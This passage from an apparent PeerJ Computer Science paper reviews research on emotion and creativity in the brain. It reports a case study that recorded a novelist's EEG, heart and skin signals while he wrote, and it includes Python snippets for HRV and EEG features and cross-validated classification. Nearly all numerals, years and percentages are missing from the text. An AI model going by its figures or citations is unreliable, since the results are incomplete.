physiological measurements are feasible in a real life situation. the framework described here is the basis for follow-up studies in which several hundreds of readers will read the book before publication while being measured with a similar setup as used here with the author (brouwer et al., ). the applied, real life perspective guided the selection of theoretical models and measurement methods. art, beauty and neuroscience there is a growing interest in using neurophysiological measures to assess media, including paintings, music and films. 
research in this area is still at the forefront of cognitive neuroscience and results and theoretical foundations are still under debate. an important question that has fascinated and divided researchers from both the neurosciences and the humanities is whether brain activity can provide insight in what true art and beauty is. from an applied point of view, the relevant question is whether an individual’s brain pattern is informative of his or her appraisal of the piece of art. research of zeki and colleagues, amongst others, has shown that there is a functional specialization for perceptual versus aesthetic judgments in the brain (ishizu & zeki, ) and that there is a difference in van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. activation pattern for paintings experienced as beautiful by an individual and those experienced as ugly. this finding is independent of the kind of painting: portrait, landscape, still life, or abstract (kawabata & zeki, ). hasson and colleagues ( ) used fmri to assess the effects of different styles of filmmaking on brain patterns and suggest that neurophysiological sensing techniques can be used by the film industry to better assess its products. the latter was done by fleureau, guillotel & orlac ( ) who measured skin conductance as an affective benchmark for movies and by golland, keissar & levit-binnun ( ) who measured cardiovascular and electrodermal signals and found a high degree of simultaneity between viewers, but also large individual differences with respect to effect size. so far, interactivity based on viewers emotional state has not moved beyond a few artistic experiments: ‘‘unsound’’ by filmtrip and sarc (http://www.filmtrip.tv/) and ‘‘many worlds’’ by alexis kirke (http://www.alexiskirke.com/). in this paper we look at the (applied) neuroscience behind both the creative and the emotional brain and how emotional state can be captured using wearable, mobile technology that is usable while reading an ebook. we will also explore the possibilities opened up after capturing a reader’s emotional state and what the ebook of the future might look like. the paper also presents the data of the writer during the creation of emotional text (van der werf & van erp, ). the emotional brain stimuli evoking emotions are processed in the brain through specific pathways and with the involvement of several brain areas. in other words, the emotional brain is a network of collaborating brain areas and not a single location (dalgleish, ; tovote, fadok & luthi, ). the majority of the sensory information entering the brain goes to the primary sensory areas, but a small part of the information goes to the amygdala, part of the limbic system deep inside the human brain. a main driver of the amygdala is danger: in case of a potential threat to the organism, the amygdala is able to respond quickly and prepare the body for action without much stimulus processing. the amygdala enables the release of stress hormones leading to peripheral effects, for instance increased heart rate to pump more blood to the lungs and muscles. after the amygdala, processing continues through the cingulate cortex, the ventromedial prefrontal cortex and finally the dorsolateral prefrontal cortex. only in the dorsolateral prefrontal cortex is the processing stream through the amygdala integrated with the more cognitive processing stream from the sensory cortices. 
the emotional experience is a result of the interpretation of both processing routes taking into account the context and previous experiences. this integration and interpretation of information is a typical function of the prefrontal cortex (isotani et al., ). psychological framework of emotions before we can discuss how we can measure emotional state, we should first look into the frameworks to classify emotions. there are many psychological frameworks available. classic work by ekman ( ) and russell ( ) shows that there are several basic emotions: fear, disgust, anger, happiness, sadness and surprise. this set of six basic emotions has been expanded through the years with numerous subclasses. from a neuroscientific van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.filmtrip.tv/ http://www.alexiskirke.com/ http://dx.doi.org/ . /peerj-cs. point of view, an important question is whether these emotions each have their own (unique) neuronal location or circuit (i.e., a discrete model (barrett & russell, )), or vary along several independent dimensions (i.e., a dimensional model (mauss & robinson, )), a matter that is still under debate. as described above, experiencing an emotion is the result of the integration and interpretation of numerous information streams by an extended network of brain areas which makes a discrete model unlikely. therefore, we adopt a dimensional model, or more specifically the circumplex model of emotion (russell, ; russell & barrett, ; posner, russell & peterson, ) in which emotions are plotted in two dimensions: arousal and valence. for instance, anger is linked to negative valence and high arousal, sadness to negative valence and low arousal, and happiness to positive valence and high arousal and contentment to positive valence and low arousal. this model is commonly used to investigate for instance emotional words, facial expressions, and affective states. the circumplex model of emotion stems from the ratings of individual, written words. neuro imaging studies confirm the two-dimensional model of valence and arousal and although there may be complex interactions between both dimensions, they both have a different signature of brain activation, spatially as well as temporally. arousing words show a different pattern (compared to neutral words) mainly in the early processing stages (i.e., within ms after presentation including the following erp components: early posterior negativity (epn), p , n , p , and n ) while the difference between positively versus negatively valenced words shows in later processing stages (between and ms after presentation including the late positive complex (lpc)) (rellecke et al., ). in the spatial domain, arousal is linked to amygdala activity and valence to the cingulate cortex and the orbitofrontal cortex (colibazzi et al., ; herbert et al., ; kuchinke et al., ; lewis et al., ; posner et al., ). excellent reviews are given by kissler, assadollahi & herbert ( ) and citron ( ). based on her review, citron (citron, ) comes to the conclusion that positive and negative valence may differ with respect to the cognitive functions they activate and are not necessarily a continuous dimension. although a novel is more than a collection of individual words, there has been very little research on the physiological reactions to reading larger pieces of text (see the first section of this paper), but a lot to reading individual words. this project aims to fill that void. 
emotion classification using neurophysiological measures with the circumplex model as point of departure, we can start to identify physiological signals that reflect the arousal and valence of emotions and that can potentially be measured while reading outside a laboratory environment. we will look at a broader range of methods used to induce an emotional state than written words and at a broader set of physiological measures than eeg and fmri. for example, min, chung & min, ( ) induced emotional state by letting subjects imagine pleasant, unpleasant, aroused and relaxed situations and measured effects on eeg, heartrate, skin conductance, skin temperature and respiration. valence valence requires central nervous system indices as it is less clearly reflected in peripheral measures. wearable sensors like eeg are not able to measure activity in deeper structures van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. like the limbic system but as reviews show (kissler, assadollahi & herbert, ; citron, ), valence is strongly linked to later processing stages involving more superficial brain structures related to cognitive processing. valence is reflected in (late) erp components (bayer, sommer & schacht, ; herbert, junghofer & kissler, ; holt, lynn & kuperberg, ), in the power in specific eeg frequency bands like alpha (bahramisharif et al., ; klimesch, sauseng & hanslmayr, ), in the relative power in different eeg bands (ko, yang & sim, ) and in asymmetrical alpha activity in the prefrontal cortex (isotani et al., ; fox, ; schmidt & trainor, ; tomarken et al., ) indicating increased left prefrontal cortex activity for positive valence and increased right prefrontal cortex for negative valence. however, power in the different frequency bands and hemispheric asymmetry are under the influence of many factors, which may only partially correspond to emotional valence. for example, hemispheric asymmetry has been linked to stress (lewis, weekes & wang, ) and the tendency to approach versus to avoid stimuli (verona, sadeh & curtin, ), and low power in the alpha band may be caused by the fact that stimuli with high valence may attract more attention (brouwer et al., ; muehl et al., ). arousal arousal is less clearly linked to brain activation patterns except for activity in the amygdala and the reticularformation (posner, russell & peterson, ), which aredifficult to measure with wearable sensors like eeg. however, arousal is reasonably clearly reflected through a relatively strong activation of the sympathetic as compared to the parasympathetic autonomous nervous system. arousal can be measured peripherally through, for instance, skin conductance (increasing conductance with increasing arousal (roth, )), heart rate variability (hrv), especially high frequency hrv as this is exclusively affected by the parasympathic system (reduced high frequency hrv with increased arousal (berntson et al., )), pupil size, heart rate (hr) and respiration frequency (all increased with increased arousal, although this pattern is not consistent over studies, see kreibig ( ) for an elaborate overview). 
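the indices discussed above can be turned into concrete features. the sketch below, using numpy and scipy, shows one common way to compute a frontal alpha-asymmetry index (often linked to valence) and an rmssd-based heart rate variability index (which tends to drop with rising arousal). the sampling rate, the 8–12 hz alpha band, the channel pairing and the synthetic example data are assumptions for illustration only, not the settings used in this study.

```python
import numpy as np
from scipy.signal import welch

FS = 256  # assumed EEG sampling rate (Hz)

def band_power(signal, fs, lo, hi):
    """Average power of a 1-D signal in the [lo, hi] Hz band (Welch PSD)."""
    freqs, psd = welch(signal, fs=fs, nperseg=fs * 2)
    mask = (freqs >= lo) & (freqs <= hi)
    return psd[mask].mean()

def frontal_alpha_asymmetry(left_frontal, right_frontal, fs=FS):
    """ln(right alpha power) - ln(left alpha power); more positive values are
    commonly read as relatively greater left-hemisphere activity (positive valence)."""
    alpha_l = band_power(left_frontal, fs, 8, 12)
    alpha_r = band_power(right_frontal, fs, 8, 12)
    return np.log(alpha_r) - np.log(alpha_l)

def rmssd(rr_intervals_ms):
    """Root mean squared successive differences of RR intervals (ms),
    a high-frequency HRV index that tends to decrease with rising arousal."""
    diffs = np.diff(np.asarray(rr_intervals_ms, dtype=float))
    return np.sqrt(np.mean(diffs ** 2))

# example with synthetic data: 10 s of alpha-dominated "EEG" on two channels
t = np.arange(0, 10, 1 / FS)
left = np.sin(2 * np.pi * 10 * t) + 0.1 * np.random.randn(t.size)
right = 0.5 * np.sin(2 * np.pi * 10 * t) + 0.1 * np.random.randn(t.size)
print(frontal_alpha_asymmetry(left, right))
print(rmssd([812, 790, 805, 820, 798]))
```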
current state of the art in (applied) emotion capture the state-of-the-art in emotion detection using neurophysiological indices is that we are able to distinguish several valence and arousal levels in a lab environment when subjects are sitting still and sufficient control data is gathered beforehand to train classification algorithms (see van erp, brouwer & zander ( ) for an overview). however, it is important to note that the relation between physiology and emotion is not straightforward. different studies with different stimuli and contexts report different types of correlations (kreibig, ; dockray & steptoe, ). it is thus important to study relations between (neuro-) physiology and emotion within the context and under the circumstances of interest (brouwer et al., ; van erp, lotte & tangermann, ). an important step in this project, is to bring neurophysiological signals out of the lab and explore their potential value in daily life (van erp, brouwer & zander, ; van erp, lotte & tangermann, ). monitoring and using the (neuro-) physiological signals of van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. readers is new, and entertainment in general is a good first case to transfer the technology from the laboratory to real life. this transition will come with several challenges ranging from coping with external noise due to movement artifacts, multitasking users, and usability aspects such as prolonged usage (van erp, lotte & tangermann, ; van erp et al., ; van erp et al., ). first steps in this transition have recently been made in studies investigating eeg signals in gaming (reuderink, mühl & poel, ) and into music perception in realistically moving participants (leslie, ojeda & makeig, ). here we also present the case of the writer wearing physiological sensors for several hours a day and for days in a row. the creative brain the current case study focused on the writer and his emotional signals during the creative writing process. our primary goal was to implement and learn about the transition from laboratory to real life before upscaling the set-up to hundreds of readers, and to capture the emotional signals of the writer as function of the emotional content of the written paragraphs. we deemed it worthwhile, nevertheless, to have a quick look at the creative brain as well. most people would agree that creative abilities make us unique in the animal kingdom. interestingly, we understand little of the processes that drive or facilitate creativity and still debate on the definition of creativity, although most agree upon the importance of both novelty and usefulness (see piffer ( ) for an elaborate discussion). similar to the neuroscience of art and beauty, neuroscientific research into creativity can still be characterised as embryonic and neuroscientific models are not widely established yet. like emotion, creativity is not related to a single brain area but rather to networks of brain areas. based on an extensive review, dietrich & kanso ( ) even stated that ‘‘creativity is everywhere’’; see also arden et al. ( ). having said that, recent neuroimaging studies seem to show that creativity involves common cognitive and emotional brain networks also active in everyday tasks, especially those involved in combining and integrating information. for the current project, it is useful to distinguish two different types of creative processes as described by dietrich ( ). 
the first can be called controlled creativity often in relation to finding creative solutions for a particular, given problem. this creative process is controlled through the prefrontal cortex (ellamil et al., ) that guides the search for information and the combination of information within a given solution space. a powerful mechanism which is bound, though, by limitations of the prefrontal cortex; for instance, with respect to the number of solutions that can be processed in working memory. the second type can be named spontaneous creativity, often in relation to artistic expression. this form of creativity comes without the restrictive control from the prefrontal cortex, and the process differs from controlled creativity qualitatively (e.g., solutions are not bound by rational rules like the rules of physics) and quantitatively (the number of solutions is not restricted by for instance the limited capacity of working memory). spontaneous creativity is linked to unconscious processes (of which dreaming may be an extreme form). however, the prefrontal cortex becomes involved in spontaneous creativity when solutions will eventually reach the conscious mind, and the prefrontal cortex is required to evaluate them and bring them to further maturity. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recent data show us that less activity in the dorsolateral prefrontal cortex links to increased spontaneous creativity in, for instance, musicians (limb & braun, ; liu et al., ), and increased activation to increased controlled creativity. results also show that there is a burst of wide-spread gamma activity about ms before the moment of insight in spontaneous creativity. gamma activity is, amongst other features, linked to binding pieces of information. a burst of gamma activity is indicative of finding (and binding) a new combination of chunks of (existing) information. fink & benedek ( ) underline the importance of internally oriented attention during creative ideation in a more general sense, reflected in an increase in alpha power. creativity is also linked to hemispheric asymmetry. a meta-analysis (mihov, denzler & förster, ) showed that the right hemisphere has a larger role in creative processes than the left hemisphere. this is confirmed by patient research (mayseless, aharon-peretz & shamay-tsoory, ; shamay-tsoory et al., ). a lesion in the right medial prefrontal cortex hinders the creation of original solutions while a lesion in the left medial prefrontal cortex seems to be beneficial for spontaneous creativity. however, experiments with creative students (carlsson, wendt & risberg, ) and extremely creative professionals from science and arts (chávez-eakle et al., ) both show bilateral cerebellum involvement, seemingly confirming the statement that ‘‘creativity is everywhere in the brain.’’ however, these findings are general findings and may not be applicable to the creative writing process (shah et al., ). for instance, creative writing seems to result in increased activity in the left prefrontal cortex (presumably because of its links to important language areas in the left hemisphere) except when writing emotional text, for which activity in the right hemisphere seems to be greater. this shows that the body of knowledge on the creative brain is growing but still limited and identifying neural correlates of the creative writing process requires further research. 
another interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative, non-fiction writing like scientists and journalists do. lotze and colleagues found that the caudate nucleus (involved in skilled behavior) was active in experienced creative writers but not in novices (erhard et al., ; lotze et al., ), indicating that creative writing can indeed be a (trainable) skill. the case study methods participant arnon grunberg (http://www.arnongrunberg.com/) participated in the study. arnon grunberg was born in and has lived in new york since . he writes novels, short stories, columns, essays and plays. his work was awarded with several national and international prizes and translated into languages. he participated voluntarily, being aware that his participation would not be anonymous. all data were collected in november in arnon’s apartment in new york. the institutional review board of tno human factors (tcpe soesterberg, the netherlands) approved the study after inclusion of specific sections in the informed consent regarding privacy and data dissemination. arnon read and signed the informed consent before data gathering began. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.arnongrunberg.com/ http://dx.doi.org/ . /peerj-cs. figure location of the electrodes in the – system. apparatus we used commercially available hardware and software to record physiological parameters, facial expression and text entry. in addition, paper and pencil were used for subjective questionnaires described in the next section. all neurophysiological signals were recorded using a wearable mobita r© -channel physiologic signal amplifier system sampling at , hz (tmsi, hengelo, the netherlands, http://www.tmsi.com/). the available channels were used for eeg ( tmsi water based electrodes, see fig. for the layout of the electrodes), ecg (two pre-gelled disposable tmsi snap electrodes) and endosomatic skin potential esk (pair of tmsi finger electrodes). the mobita r© has built-in accelerometers which we used to log possible activity of the writer and to synchronize the physiological data to other data gathered through a noldus observer xt r© system (noldus it, wageningen, the netherlands; http://www.noldus.com/). this system recorded the images from two ip cameras (one providing an overview of the work space and one providing a close-up of the writer’s face for later analysis of his facial expression), a continuous screen dump of the writer’s pc screen, and the writer’s keystrokes (noldus ulog tool r©). the writer used his normal work space and own pc, see fig. . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.tmsi.com/ http://www.noldus.com/ http://dx.doi.org/ . /peerj-cs. figure writer showing the neurophysiological sensors (a) and during writing (b). table experimental protocol for one day. 
start of the day instrumentation of the participant and check of measurement systems calibration of emotional state subjective questionnaires: feelings grid, vas, des full block continuous monitoring of physiology and facial expression continuous logging of text entry continuous observation by experimenter subjective questionnaires at significant eventsa: feelings grid, des self subjective questionnaires at end of block: feelings grid, vas, des self, des book block similar to block end of the day subjective questionnaires: feelings grid, vas, des full open questions notes. asignificant events could include a writer’s block, or moment of great insight etc. to be identified by the participant himself. eventually, no ‘significant events’ were indicated. experimental protocol table gives the outline of the experimental protocol for one day. table gives the details on the experimental protocol. data processing our intention was to use the calibration sessions of each day to identify differences in physiological markers that could be linked to the emotional content of the written paragraph. when we can reliably establish this ‘ground truth,’ it could consecutively be used to analyze the data gathered during the writing blocks. after checking the synchronization between the different data streams, the physiological data of the calibration session were van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table specification of the experimental protocol. instrumentation of the participant and check of measurement systems the physiological sensors were attached to the writer and signals checked for their integrity. video cameras, screen and keyboard logging were switched on and checked. the mobita recorder was time linked to the observer xt sys- tem by using the mobita to type a specific series of key strokes recorded by the accelerometers in the mobita, the ulog module of the observer xt and the overview camera. calibration of emotional state •at the beginning of each day the following calibration data were recorded in fixed order: ◦ min of rest with eyes open ◦ min of rest with eyes closed ◦ blocks of min filled with writing a paragraph with the following instruction: ‘‘write a paragraph on this picture with emotion×, as if you are writing a paragraph in your novel.’’ this instruction was ac- companied with an a sized, full color picture from the iaps database (lang, bradley & cuthbert, ) matching emotion× (disgust, fear, sadness, amusement, contentment, excitement). we selected pic- tures from the iaps database, for each emotion: disgust ( , , , , , , , , , ), fear ( , , , , , , , , , ), sadness ( , , , , , , , , , ), amusement ( , , , , , , , , , ), contentment ( , , , , , , , , , ), and excite- ment ( , , , , , , , , , ). the order of the emotions was bal- anced over the days, each picture was only used once during the experiment. ◦ min of rest with eyes open ◦ min of rest with eyes closed feelings grid •the feelings grid (russell, weiss & mendelsohn, ) was a pen and paper a -sized form with the instruction ‘‘please indicate how you feel right at this moment. 
place an ‘‘x’’ in the box closest to how you are feeling at this time.’’ the form consisted of a × square grid with the following markers: ◦middle-top: arousal, middle-bottom: sedation, sleepiness ◦ left-middle: unpleasant, right-middle: pleasant ◦ left-top: anger, stress; right-top: joy excitement ◦ left-bottom: depression, sadness; right bottom: relaxation, contentment vas (visual analog scale) the vas was a pen and paper test with the instruction ‘‘please mark how you feel right at this moment.’’ four scales were printed on one a : relaxed–agitated, happy–sad, optimistic–pessimistic, state of flow–no flow. des full the des (fredrickson et al., ) full was a paper and pen test with the instruction ‘‘please indicate how each emo- tion reflects how you feel right at this moment.’’ it depicted the following items on an a -sized paper with five tick boxes to their right representing not at all ( )—completely ( ): amusement, awe, contentment, grat- itude, hope, love, pride, sexual desire, joy, interest, anger, sad, scared, disgust, contemptuous, embarrassed, repen- tant, ashamed, surprised, sympathetic. des self the des self was a paper and pen test with the instruction ‘‘please mark the emotions that best reflect your feelings over the past measurement period.’’ it contained the same items as the des full on an a -sized form but with only one tick box to their right. des book the des book was the same as the des self, except for the instruction: ‘‘please mark the emotions that best describe the section you wrote in the past measurement period.’’ open questions during the debriefing, the writer answered several open questions about the use of substances (coffee, tea, cigarettes, medication etc.), the experience of flow, satisfaction about the progress, significant moments during the writing etc. the experimenter could expand the open questions based on observations made during the day. separated in epochs corresponding to min rest eyes open, min rest eyes closed, × min ‘emotional writing’ (each corresponding to one of six different emotional pictures and descriptors), and again min rest eyes open, min rest eyes closed. eeg. the eeg data were processed using the following pipeline: re-referencing to channel tp , rejection of channels with very large variance (channels o , oz and o were very van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. noisy and removed completely from the dataset), band pass filtering . – hz, and down sampling to hz. initialy, the eeg data of the remaining channels were used in an independent component analysis (ica) to identify and remove potential artifacts. however, the ica revealed that potential artifacts were non-stationary (i.e., changing over time) and therefore difficult to identify and thus no more data were removed. the power in different frequency bands: delta ( – hz), theta ( – hz), alpha ( – hz), smr ( – hz), beta ( – hz) and gamma ( – hz) were used as features in the classification. peripheral physiology. as a measure of heart rate, we determined the mean interval between successive r-peaks in the ecg (rri) for each epoch and converted this to mean heart rate (meanhr = /meanrri). four measures of heart rate variability were derived. the root mean squared successive difference between the rris (rmssdrri) reflects high frequency heart rate variability. we also determined heartrate variability in the low, medium and high band using a spectral analysis (hrvlow, hrvmed, hrvhigh). 
high-frequency heart rate variability was computed as the power in the high frequency range ( . – . hz) of the rri over time using welch’s method applied after spline interpolation; similarly for mid-frequency ( . – . hz) and low-frequency ( – . hz) heart rate variability. no anomalies were present in the ecg data so no data was removed. from the esk, the mean esk over the epochs was calculated. for the esk we removed one outlier (contentment epoch on day ). classification analysis using eeg and peripheral physiology features. to determine how well various feature sets could predict the emotional state of the author during the calibration session we performed a classification analysis. classification was performed using the donders machine learning toolbox (van gerven et al., ). two types of classifiers were used: a linear support vector machine (svm) and an elastic net model with logistic regression (friedman, hastie & tibshirani, ). as input we used the features that were standardized to have mean and standard deviation on the basis of data from the training set. one-tailed binomial tests were used to determine whether classification accuracy was significantly higher than chance. facial expression. the images from the close-up camera were analysed offline using noldus facereader software. output for each epoch are intensity values for the following classifications: neutral, happy, sad, angry, surprised, scared, disgusted. subjective questionnaires. the data of the feelings grid, vas, and des full questionnaires was not pre-processed but directly analysed. we only statistically analysed the main effects of day ( levels) and session (start of day and end of day for des full, and start of day, end of block , end of block , end of day for feelings grid and vas). the des full scores were analysed using non-parametric statistics with alpha level bonferroni adjusted for the number of comparisons. feelings grid and vas scores were analysed with a parametric anova. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. procedures we started the measurements on the day the writer started with a new novella to be used in phase of the project. we adjusted the measurements to his usual daily writing schedule comprising two blocks: one in the morning and one in the late afternoon or early evening. he normally writes for about two hours and fills the time in between with other activities (including other writing activities). during a writing block, he was engaged in other activities as well like answering emails and phone calls etc., but never during the instrumentation and calibration. all activities during the measurement blocks were logged by the experimenter who was always present during the measurements. we measured for nine consecutive days. at the end of the day, the experimenter and the writer would make a specific schedule for the next day. the writer also reflected on his experiences over the day, including the user experience of wearing the equipment and being observed. the day before the start of the experiment, the protocol, instructions etc. were explained in great detail, the writer signed the informed consent, his workplace was instrumented and the equipment tested. besides the addition of the equipment, the writer’s workplace was not altered in any way to give the writer the best opportunity to behave as usual. on each measurement day, the experimenter came to the apartment as scheduled and followed the protocol as detailed above. 
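Returning to the heart-rate-variability computation described at the start of this subsection: because the R-R intervals are irregularly spaced in time, they are first interpolated onto a regular grid (the study used spline interpolation) and the band power of the resulting signal is then estimated with Welch's method. A minimal Python sketch of that step follows; the band limits passed in are illustrative, since the exact low/mid/high boundaries are partly elided in the source.

```python
import numpy as np
from scipy.interpolate import CubicSpline
from scipy.signal import welch

def hrv_band_power(rpeak_times, rri, band, fs_resample=4.0):
    """rpeak_times: times (s) of the R-peaks; rri: R-R intervals (s) at those times.
    band: (lo, hi) frequency limits in Hz, e.g. (0.15, 0.4) as an illustrative high band.
    Returns the power of the R-R interval series within the requested band."""
    # Spline-interpolate the RRI series onto a regular time grid before spectral analysis.
    spline = CubicSpline(rpeak_times, rri)
    t = np.arange(rpeak_times[0], rpeak_times[-1], 1.0 / fs_resample)
    rri_regular = spline(t)
    freqs, psd = welch(rri_regular - rri_regular.mean(), fs=fs_resample,
                       nperseg=min(len(rri_regular), 256))
    lo, hi = band
    return psd[(freqs >= lo) & (freqs < hi)].sum()
```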
at the end of the day, all data were encrypted and saved to an external hard disk. results classification of baseline vs. emotion conditions in the calibration blocks first, we determined whether the feature set contained information to discriminate the baseline conditions (eyes open and eyes closed) from the emotional (writing) epochs using binary classification (baseline vs. non-baseline). for this purpose we performed a ‘leave- one-day-out’ cross validation using the svm classifier. this method is to be preferred over random n-fold cross validation since it better accounts for possible correlations between data during the day (lemm et al., ). still, the results when using random folds were found to be comparable to the results of the analysis presented here. it is also important to compensate for the imbalance in the number of conditions, with baseline blocks and emotional blocks in the set. all reported performance scores follow a binomial distribution and the variability of the binomial distribution follows directly from the average score and the number of measurements (the distribution is not well approximated with a gaussian distribution and therefore the variance is not a good indicator of the variability in the results). for a larger number of measurements the variability is approximately equal to p*( -p)/n (with p estimated by the score, n the number of measurements). when all six physiology features (i.e., meanhr, hrvlow, hrvmed, hrvhigh, rmssdrri, meanesk were used as input to the classifier the average model performance (over all days)) was %, with a hit-rate (score for correctly classifying baseline blocks) of % and a false-alarm-rate (fa-rate, i.e., fraction of falsely classified emotional blocks) of %, resulting in an equal cases (in the situation in which both conditions occur equally frequent) performance of % (p < . ). individual anovas with condition as independent variable (baseline vs. writing) and physiological measure as dependent van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure results of the physiological measures heart rate (a) and rmssd rri (b) as function of the different calibration blocks. eyes open and eyes closed blocks were measured before and after the emo- tional blocks. the order of the emotional blocks was balanced over days. error bars denote the standard error of the mean. variable showed significant differences for the heart rate variability measures only (all f values > . , all p values < . ). figure gives the hr and rmssd rri as function of calibration block. figure summarizes the power distribution for the different frequency bands averaged over the rest epochs (fig. a) and the writing epochs (fig. b). when the eeg features van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure column (a) shows the power in the different frequency bands in the rest blocks (eyes open and eyes closed combined) and column (b) in the writing blocks. column (c) gives the weights of the features in the classification model. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. were used as input, the average model performance (over all days) was % with a hit-rate of % and a false-alarm-rate (fa-rate) of %, resulting in an equal cases performance of % (p < . ). the model weights are depicted in fig. c. inspecting fig. 
shows that there are three major differences between rest and writing reflected in the model weights. the writing blocks show: ( ) increased frontal power in the delta and theta bands, ( ) wide spread suppression of alpha, and ( ) central increase in beta and gamma activity. the first effect is most likely caused by eye movements. the second effect relates to the suppression of the brain’s idle state during rest. the increase in gamma activity may be related to creative processes as described in ‘the creative brain’, but gamma components are also susceptible to muscle artifacts caused by e.g., jaw clenching and forehead movements. if we only use the alpha and gamma features in the classifier, equal class performance is %, indicating that a reliable difference can be obtained without using features that may be contaminated with eye movements. when all features (peripheral physiology and eeg) were used as input the average model performance was also %, with a hit-rate of % and a false-alarm-rate (fa-rate) of %, resulting in an equal cases performance of % (p < . ), a non-significant improvement relative to using only eeg features, indicating that the added value of incorporating features other than eeg ones is small in this case. a closer inspection of the feature weights in the classification model showed that the highest weights are attributed to the delta ( – hz) and theta ( – ) bands in channels fp , fpz, fp (i.e., frontal channels). the equal class performance of a classification model using only these six features is . (compared to . for a model using all features). slow ( – hz) frequency bands of eeg may pick up eye movements and should be evaluated with caution (please note that eye movements were not removed from the eeg data). indirect measurement of eye movements in the eeg signal masks the information in the primary eeg. even in case it is a reliable classifier for the current experimental setup, we consider it an artifact. classification of valence and arousal in the calibration blocks model performance was determined for classifying low vs. high valence and arousal using -fold cross validation using a range of parameters: • features from eeg, physiology or both, • binary classification for predicting outcomes higher than the median value or using only the extreme values, i.e., lower than the . -quantile or higher than the . -quantile, • using raw or normalized features, in which case the features were normalized by dividing by the average feature value for the eyes-open conditions (for that day), • using svm or elastic net classifier with logistic regression. in none of the cases did we find classification performance deviating significantly from chance performance. since classification performance using the whole set of eeg data did not result in above-chance performance, we did not continue using specific subsets only, e.g., to look at the power in specific eeg frequency bands like alpha (bahramisharif et al., ; klimesch, sauseng & hanslmayr, ), at the relative power in different eeg bands (herbert, junghofer & kissler, ) and at asymmetrical alpha activity in the prefrontal van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cortex. individual anovas on the physiological measures confirmed these observations: all f-values < . and all p values > . ; see also fig. . 
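The evaluation scheme used in these classification analyses (training-set standardization, a linear classifier, leave-one-day-out cross-validation, and a chance-corrected score for the imbalance between baseline and emotional epochs) can be sketched as follows. This assumes scikit-learn and SciPy; the study itself used the Donders machine learning toolbox for MATLAB, and the 'equal cases' score below is one common way (balanced accuracy) to realize the correction described in the text.

```python
import numpy as np
from scipy.stats import binomtest
from sklearn.model_selection import LeaveOneGroupOut
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC

def leave_one_day_out(X, y, days):
    """X: (n_epochs, n_features); y: 1 = baseline, 0 = emotional writing;
    days: day index per epoch, used as the cross-validation group."""
    hits = fas = n_pos = n_neg = 0
    for train, test in LeaveOneGroupOut().split(X, y, groups=days):
        scaler = StandardScaler().fit(X[train])        # standardize on training data only
        clf = LinearSVC().fit(scaler.transform(X[train]), y[train])
        pred = clf.predict(scaler.transform(X[test]))
        hits += np.sum((pred == 1) & (y[test] == 1))
        fas += np.sum((pred == 1) & (y[test] == 0))
        n_pos += np.sum(y[test] == 1)
        n_neg += np.sum(y[test] == 0)
    hit_rate, fa_rate = hits / n_pos, fas / n_neg
    equal_cases = 0.5 * (hit_rate + (1.0 - fa_rate))   # score if both classes were equally frequent
    return hit_rate, fa_rate, equal_cases

# One-tailed binomial test against chance; for n epochs the variance of the observed
# proportion p is approximately p * (1 - p) / n, as noted in the text above.
def above_chance_p(n_correct, n_total, chance=0.5):
    return binomtest(n_correct, n_total, chance, alternative="greater").pvalue
```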
because building a reliable valence and arousal classification algorithm using the calibration data turned out to be impossible, we could not further classify the novel writing data. facial expression in the calibration blocks we used the facereader r© output directly in the analysis and found no significant differences between the different emotional paragraphs. generally, the facial expression of the writer was classified as neutral (about %), sad (about %) or angry (about %). the remaining % was dispersed over happy, surprised, scared and disgusted. subjective questionnaires the des full showed neither differences over the days ( – ) nor over sessions (start—end of day). analysis of the feelings grid scores showed a significant effect of arousal over sessions: f( , )= . , p < . . a post-hoc lsd test showed a significant difference between start of the day and the end of block and end of the day. the analyses of the vas scores showed no effect over days, but a large effect over sessions of happy: f( , )= . , p < . , optimistic: f( , )= . , p < . and flow: f( , )= . , p < . , and a trend for relaxed: f( , )= . , p < . . the means of the significant effects over session are presented in fig. . the figure shows that happy, optimism and flow are rated high at the start of the day but systematically decrease over the writing sessions with a stabilization or reversal at the end of the day. for arousal, this effect is inverted. these trends are confirmed by post-hoc lsd tests. in the daily debriefing session at the end of the day, the writer indicated that the eeg cap was uncomfortable at the start but that he got used to wearing the cap and the other physiological sensors. he experienced the cameras as more obtrusive and disturbing than the physiological sensors. he elaborated on this in several public interviews (e.g., in the new york times: www.nyti.ms/ dgxkfr). discussion set-up and user experience the case study primarily focussed on measuring neurophysiological indices over prolonged periods outside a laboratory environment before applying the technology in a large scale experiment with the readers of the novel. inspection of the signals revealed that, except for eeg channels o , oz and o , we were able to record reliable signals in a real life situation using wearable/wireless sensor technology and that the setup was comfortable enough for the writer to work for hours a day wearing the sensors. the noise in the occipital channels may be caused by (neck) muscle activity related to mouse and keyboard actions. the ica analysis indicated that potential artifacts were non-stationary (i.e., changed over time), an effect similar to what we find with readers (brouwer et al., ). non-stationarities may be more common in real-world, multitasking environments and hamper identification and removal of artifacts (van erp, lotte & tangermann, ). this increases the relevance of including emg and eog sensors to the sensor suite. data 